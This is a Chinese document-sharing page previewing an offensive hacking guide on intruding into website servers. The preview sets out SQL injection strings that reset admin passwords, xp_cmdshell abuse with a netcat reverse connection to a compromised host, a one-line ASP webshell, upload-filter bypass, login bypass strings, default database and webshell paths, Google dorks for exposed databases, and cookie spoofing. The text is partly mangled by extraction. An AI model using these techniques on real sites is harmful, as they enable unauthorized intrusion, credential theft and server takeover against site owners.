入侵网站服务器的方法.doc

上传人:F****n 文档编号:103201017 上传时间:2019-10-06 格式:DOC 页数:16 大小:66KB
返回 下载 相关 举报
入侵网站服务器的方法.doc_第1页
第1页 / 共16页
入侵网站服务器的方法.doc_第2页
第2页 / 共16页
入侵网站服务器的方法.doc_第3页
第3页 / 共16页
入侵网站服务器的方法.doc_第4页
第4页 / 共16页
入侵网站服务器的方法.doc_第5页
第5页 / 共16页
点击查看更多>>
资源描述

《入侵网站服务器的方法.doc》由会员分享,可在线阅读,更多相关《入侵网站服务器的方法.doc(16页珍藏版)》请在金锄头文库上搜索。

1、http:/ 网站旁注入侵这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站,然后通过一些薄弱的网站实施入侵,拿到权限之后转而控制服务器的其它网站。5、sa注入点利用的入侵技术这种是ASP+MSSQL网站的入侵方式,找到有SA权限的SQL注入点,然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号,然后通过3389登录进去,或者在一台肉鸡上用NC开设一个监听端口,然后用VBS一句话木马下载一个NC到服务器里面,接着运行NC的反向连接命令,让服务器反向连接到远程肉鸡上,这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。6、sa弱密码的入侵技术这种方式是

2、用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码,然后用SQLEXEC之类的工具通过1433端口连接到远程服务器上,然后开设系统帐号,通过3389登录。然后这种入侵方式还可以配合WEBSHELL来使用,一般的ASP+MSSQL网站通常会把MSSQL的连接密码写到一个配置文件当中,这个可以用WEBSHELL来读取配置文件里面的SA密码,然后可以上传一个SQL木马的方式来获取系统的控制权限。7、提交一句话木马的入侵方式这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。黑客通过网站的留言版,论坛系统等功能提交一句话木马到数据库里面,然后在木马客户端里面输入这个网站的数据库地址并

3、提交,就可以把一个ASP木马写入到网站里面,获取网站的WEBSHELL权限。8、 论坛漏洞利用入侵方式这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限,最典型的就是,动网6.0版本,7.0版本都存在安全漏洞,拿7.0版本来说,注册一个正常的用户,然后用抓包工具抓取用户提交一个ASP文件的COOKIE,然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马,获得网站的WEBSHELL。2入侵网站的14种可利用方法 1.上传漏洞 upfile.asp, upload.asp,upload_flash.asp ,upfile_soft.asp,upf

4、ile_softpic.asppS: 如果看到:选择你要上传的文件 重新上传或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。还有一些只是检测文件类型的,没有进行后缀名判断,这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。而且可以上传任意文件,在asp和测试中都可以上传。2.注入漏洞 pS:对MD5密码.有时我们不是哪么容易跑出来.如果是SQL数据库.那么我们可以用以下命令: http:/注入网址;update admin set password=新MD5密

5、码 where password=旧MD5密码- admin为表名./看看是什么权限的,如果权限高的话,直接用SQLTOOLS进行连接就可以执行系统命令了。http:/注入网址 and 1=(Select IS_MEMBER(db_owner)http:/注入网址 And char(124)%2BCast(IS_MEMBER(db_owner) as varchar(1)%2Bchar(124)=1 ;-/检测是否有读取某数据库的权限http:/注入网址 and 1= (Select HAS_DBACCESS(master)http:/注入网址 And char(124)%2BCast(HAS

6、_DBACCESS(master) as varchar(1)%2Bchar(124)=1 -3.旁注,也就是跨站我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了。4.暴库:把二级目录中间的/换成%5c eg:http:/ . s.asp?BigClassName=职责范围&BigClassType=1换成这样的形式提交:http:/ . s.asp?BigClassName=职责范围&BigClassType=1 如果你能看到:E:/a

7、httc/otherweb/dz/database/iXuEr_Studio.asa不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行. 5.绕过密码验证直接进入后台or=or这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有: or= or a=a ) or (a=a ) or (a=a or 1=1- or a=a 6.社会工程学这个我们都知道吧。就是猜解。猜解一些人们常用的密码,比如他的生日啊,手机号码啊。办公电话啊等等。 :http:/ admin waishi .

8、写入ASP格式数据库就是一句话木马%execute request(value)% ,常用在留言本. :http:/ 这个站用的是:杰出校友录,源码我下过了, 默认数据库/webshell路径:/database/liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin 9.默认数据库/webshell路径利用这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp

9、/diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具:网站猎手 挖掘鸡 EY:http:/ 10.查看目录法,有一些网站可以浏览目录,可以看到目录下所有的文件。 EY:http:/ http:/ 这样我们可以找到数据库,下载不用我教吧 11.工具溢出.asp?NewsID= /2j.asp?id=18 .asp?id=这种方法可以取得大量的WEBSHELL 12.搜索引擎利用(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ (2).找网站的

10、管理后台地址: site:intext:管理 site:intitle:管理 关键字很多,自已找 site:inurl:login (3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 13.COOKIE诈骗把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。然后就直接登录有了网站后台管理员权限了。这个我就不多讲了 14.利用常见的漏洞,如动网BBS EY:http:/ 可以先用

11、:dvbbs权限提升工具,使自已成为前台管理员。 THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包 3拿到webshell权限的45种方法1, 到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!2, 到Google ,site: inurl:asp3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用or=or来登陆4, 关键字:Co Net MIB Ver 1.0网站后台管理系统帐号密码为 or=or5. 动感购物系统 inurl:help.asp登陆,如未注册成为会员!upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞6。 默认数

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 办公文档 > 教学/培训

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号